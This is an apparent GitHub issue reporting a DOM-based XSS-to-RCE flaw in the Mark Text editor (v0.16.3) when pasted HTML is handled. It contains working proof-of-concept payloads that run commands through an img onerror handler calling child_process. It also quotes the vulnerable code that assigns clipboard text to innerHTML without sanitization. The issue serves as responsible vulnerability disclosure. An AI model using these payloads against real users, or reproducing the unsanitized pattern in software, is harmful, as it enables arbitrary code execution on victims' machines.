Skip to content

Security issue: DOM based XSS & RCE - from pasting vulnerable HTML #2990

Closed
@luiseok

Description

@luiseok

Description

An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS.

<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>

The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script.

ContentState.prototype.checkCopyType = function (html, text) {
let type = 'normal'
if (!html && text) {
type = 'copyAsMarkdown'
const match = /^<([a-zA-Z\d-]+)(?=\s|>).*?>[\s\S]+?<\/([a-zA-Z\d-]+)>$/.exec(text.trim())
if (match && match[1]) {
const tag = match[1]
if (tag === 'table' && match.length === 3 && match[2] === 'table') {
// Try to import a single table
const tmp = document.createElement('table')
tmp.innerHTML = text
if (tmp.childElementCount === 1) {
return 'htmlToMd'
}
}
// TODO: We could try to import HTML elements such as headings, text and lists to markdown for better UX.
type = PARAGRAPH_TYPES.find(type => type === tag) ? 'copyAsHtml' : type
}
}
return type
}

  • Can you reproduce the issue?

Steps to reproduce

  1. Copy the vulnerable HTML code
    • <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
  2. Paste it into Mark Text app

Expected behavior:

HTML should be sanitized before pasted into DOM.

Actual behavior:

No HTML sanitize procedure. Only checks if it's wrapped with <table> or not.

Link to an example: [optional]

bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4

Versions

  • MarkText version: v0.16.3
  • Operating system:
    Windows 11 Version 21H2 - OS Build 22000.469
    Kali Linux Kali GNU/Linux Rolling 2021.4

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions